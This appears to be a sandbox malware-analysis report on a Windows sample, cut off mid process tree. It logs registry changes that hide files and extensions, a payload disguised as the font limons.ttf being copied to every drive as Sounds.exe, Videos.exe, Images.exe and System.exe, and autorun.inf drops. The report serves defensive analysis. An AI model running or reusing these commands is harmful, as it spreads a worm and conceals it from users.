Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

Kills process with taskkill 5 IoCs

evasion

pid	Process
1760	taskkill.exe
1976	Process not Found
2648	Process not Found
2952	Process not Found
2944	Process not Found

Modifies registry key 1 TTPs 24 IoCs

Modify Registry

T1112

pid	Process
1804	Process not Found
2068	Process not Found
2640	Process not Found
112	Process not Found
2168	reg.exe
536	reg.exe
2736	Process not Found
1880	Process not Found
1740	Process not Found
2668	Process not Found
1300	Process not Found
2316	reg.exe
2880	Process not Found
1604	Process not Found
1744	Process not Found
2860	reg.exe
2876	reg.exe
1916	Process not Found
1552	Process not Found
2476	Process not Found
1648	Process not Found
2904	reg.exe
2224	reg.exe
2780	reg.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1976	Process not Found
Token: SeDebugPrivilege	2648	Process not Found
Token: SeDebugPrivilege	2952	Process not Found
Token: SeDebugPrivilege	2944	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1580 wrote to memory of 2696	1580	570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe	30
PID 1580 wrote to memory of 2696	1580	570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe	30
PID 1580 wrote to memory of 2696	1580	570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe	30
PID 1580 wrote to memory of 2696	1580	570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2860	2696	cmd.exe	32
PID 2696 wrote to memory of 2860	2696	cmd.exe	32
PID 2696 wrote to memory of 2860	2696	cmd.exe	32
PID 2696 wrote to memory of 2860	2696	cmd.exe	32
PID 2696 wrote to memory of 2876	2696	cmd.exe	33
PID 2696 wrote to memory of 2876	2696	cmd.exe	33
PID 2696 wrote to memory of 2876	2696	cmd.exe	33
PID 2696 wrote to memory of 2876	2696	cmd.exe	33
PID 2696 wrote to memory of 2904	2696	cmd.exe	34
PID 2696 wrote to memory of 2904	2696	cmd.exe	34
PID 2696 wrote to memory of 2904	2696	cmd.exe	34
PID 2696 wrote to memory of 2904	2696	cmd.exe	34
PID 2696 wrote to memory of 1120	2696	cmd.exe	35
PID 2696 wrote to memory of 1120	2696	cmd.exe	35
PID 2696 wrote to memory of 1120	2696	cmd.exe	35
PID 2696 wrote to memory of 1120	2696	cmd.exe	35
PID 2696 wrote to memory of 2632	2696	cmd.exe	36
PID 2696 wrote to memory of 2632	2696	cmd.exe	36
PID 2696 wrote to memory of 2632	2696	cmd.exe	36
PID 2696 wrote to memory of 2632	2696	cmd.exe	36
PID 2696 wrote to memory of 1144	2696	cmd.exe	37
PID 2696 wrote to memory of 1144	2696	cmd.exe	37
PID 2696 wrote to memory of 1144	2696	cmd.exe	37
PID 2696 wrote to memory of 1144	2696	cmd.exe	37
PID 2696 wrote to memory of 1916	2696	cmd.exe	38
PID 2696 wrote to memory of 1916	2696	cmd.exe	38
PID 2696 wrote to memory of 1916	2696	cmd.exe	38
PID 2696 wrote to memory of 1916	2696	cmd.exe	38
PID 2696 wrote to memory of 2784	2696	cmd.exe	39
PID 2696 wrote to memory of 2784	2696	cmd.exe	39
PID 2696 wrote to memory of 2784	2696	cmd.exe	39
PID 2696 wrote to memory of 2784	2696	cmd.exe	39
PID 2696 wrote to memory of 2808	2696	cmd.exe	40
PID 2696 wrote to memory of 2808	2696	cmd.exe	40
PID 2696 wrote to memory of 2808	2696	cmd.exe	40
PID 2696 wrote to memory of 2808	2696	cmd.exe	40
PID 2696 wrote to memory of 2824	2696	cmd.exe	41
PID 2696 wrote to memory of 2824	2696	cmd.exe	41
PID 2696 wrote to memory of 2824	2696	cmd.exe	41
PID 2696 wrote to memory of 2824	2696	cmd.exe	41
PID 2696 wrote to memory of 2920	2696	cmd.exe	42
PID 2696 wrote to memory of 2920	2696	cmd.exe	42
PID 2696 wrote to memory of 2920	2696	cmd.exe	42
PID 2696 wrote to memory of 2920	2696	cmd.exe	42
PID 2696 wrote to memory of 2936	2696	cmd.exe	43
PID 2696 wrote to memory of 2936	2696	cmd.exe	43
PID 2696 wrote to memory of 2936	2696	cmd.exe	43
PID 2696 wrote to memory of 2936	2696	cmd.exe	43
PID 2696 wrote to memory of 2940	2696	cmd.exe	44
PID 2696 wrote to memory of 2940	2696	cmd.exe	44
PID 2696 wrote to memory of 2940	2696	cmd.exe	44
PID 2696 wrote to memory of 2940	2696	cmd.exe	44
PID 2696 wrote to memory of 2680	2696	cmd.exe	45
PID 2696 wrote to memory of 2680	2696	cmd.exe	45
PID 2696 wrote to memory of 2680	2696	cmd.exe	45
PID 2696 wrote to memory of 2680	2696	cmd.exe	45
PID 2696 wrote to memory of 2628	2696	cmd.exe	46
PID 2696 wrote to memory of 2628	2696	cmd.exe	46
PID 2696 wrote to memory of 2628	2696	cmd.exe	46
PID 2696 wrote to memory of 2628	2696	cmd.exe	46

Views/modifies file attributes 1 TTPs 42 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2860	Process not Found
2452	Process not Found
2456	Process not Found
928	Process not Found
1420	Process not Found
2668	attrib.exe
992	Process not Found
1672	Process not Found
1444	Process not Found
2424	attrib.exe
2976	Process not Found
2888	Process not Found
2324	Process not Found
2516	attrib.exe
2880	Process not Found
1380	Process not Found
1660	Process not Found
316	Process not Found
1380	Process not Found
2316	Process not Found
2016	Process not Found
684	Process not Found
924	Process not Found
1256	Process not Found
1796	Process not Found
2472	Process not Found
1376	attrib.exe
804	attrib.exe
2740	attrib.exe
552	Process not Found
2460	Process not Found
1004	Process not Found
1104	Process not Found
2340	Process not Found
2416	attrib.exe
1552	attrib.exe
2068	attrib.exe
1756	attrib.exe
2224	Process not Found
3008	Process not Found
1852	Process not Found
2452	Process not Found

C:\Users\Admin\AppData\Local\Temp\570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\a57342.bat "C:\Users\Admin\AppData\Local\Temp\570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe"
  2⤵
  - Loads dropped DLL
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V ShowSuperHidden /t REG_DWORD /D 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Modifies registry key
    PID:2860
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Modifies registry key
    PID:2876
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V Hidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Sounds.exe /y
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Sounds.exe /y
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Sounds.exe /y
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Sounds.exe /y
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Sounds.exe /y
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Sounds.exe /y
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Sounds.exe /y
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Sounds.exe /y
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Sounds.exe /y
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Sounds.exe /y
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Sounds.exe /y
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Sounds.exe /y
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Sounds.exe /y
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Sounds.exe /y
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Sounds.exe /y
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Sounds.exe /y
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Sounds.exe /y
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Sounds.exe /y
    3⤵
    PID:616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Sounds.exe /y
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Sounds.exe /y
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Sounds.exe /y
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Sounds.exe /y
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Sounds.exe /y
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Sounds.exe /y
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\system\drver.cab.sys c:\autorun.inf /y
    3⤵
    - Drops autorun.inf file
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\system\drver.cab.sys d:\autorun.inf /y
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\system\drver.cab.sys e:\autorun.inf /y
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\system\drver.cab.sys f:\autorun.inf /y
    3⤵
    - Drops autorun.inf file
    PID:2412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\system\drver.cab.sys g:\autorun.inf /y
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\system\drver.cab.sys h:\autorun.inf /y
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\system\drver.cab.sys i:\autorun.inf /y
    3⤵
    PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\system\drver.cab.sys j:\autorun.inf /y
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\system\drver.cab.sys k:\autorun.inf /y
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\system\drver.cab.sys l:\autorun.inf /y
    3⤵
    PID:580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\system\drver.cab.sys m:\autorun.inf /y
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\system\drver.cab.sys n:\autorun.inf /y
    3⤵
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\system\drver.cab.sys o:\autorun.inf /y
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\system\drver.cab.sys p:\autorun.inf /y
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\system\drver.cab.sys q:\autorun.inf /y
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\system\drver.cab.sys r:\autorun.inf /y
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\system\drver.cab.sys s:\autorun.inf /y
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\system\drver.cab.sys t:\autorun.inf /y
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\system\drver.cab.sys u:\autorun.inf /y
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\system\drver.cab.sys v:\autorun.inf /y
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\system\drver.cab.sys w:\autorun.inf /y
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\system\drver.cab.sys x:\autorun.inf /y
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\system\drver.cab.sys y:\autorun.inf /y
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\system\drver.cab.sys z:\autorun.inf /y
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Videos.exe /y
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Videos.exe /y
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Videos.exe /y
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Videos.exe /y
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Videos.exe /y
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Videos.exe /y
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Videos.exe /y
    3⤵
    PID:448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Videos.exe /y
    3⤵
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Videos.exe /y
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Videos.exe /y
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Videos.exe /y
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Videos.exe /y
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Videos.exe /y
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Videos.exe /y
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Videos.exe /y
    3⤵
    PID:696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Videos.exe /y
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Videos.exe /y
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Videos.exe /y
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Videos.exe /y
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Videos.exe /y
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Videos.exe /y
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Videos.exe /y
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Videos.exe /y
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Videos.exe /y
    3⤵
    PID:904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Images.exe /y
    3⤵
    PID:860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Images.exe /y
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Images.exe /y
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Images.exe /y
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Images.exe /y
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Images.exe /y
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Images.exe /y
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Images.exe /y
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Images.exe /y
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Images.exe /y
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Images.exe /y
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Images.exe /y
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Images.exe /y
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Images.exe /y
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Images.exe /y
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Images.exe /y
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Images.exe /y
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Images.exe /y
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Images.exe /y
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Images.exe /y
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Images.exe /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Images.exe /y
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Images.exe /y
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Images.exe /y
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\System.exe /y
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\System.exe /y
    3⤵
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\System.exe /y
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\System.exe /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
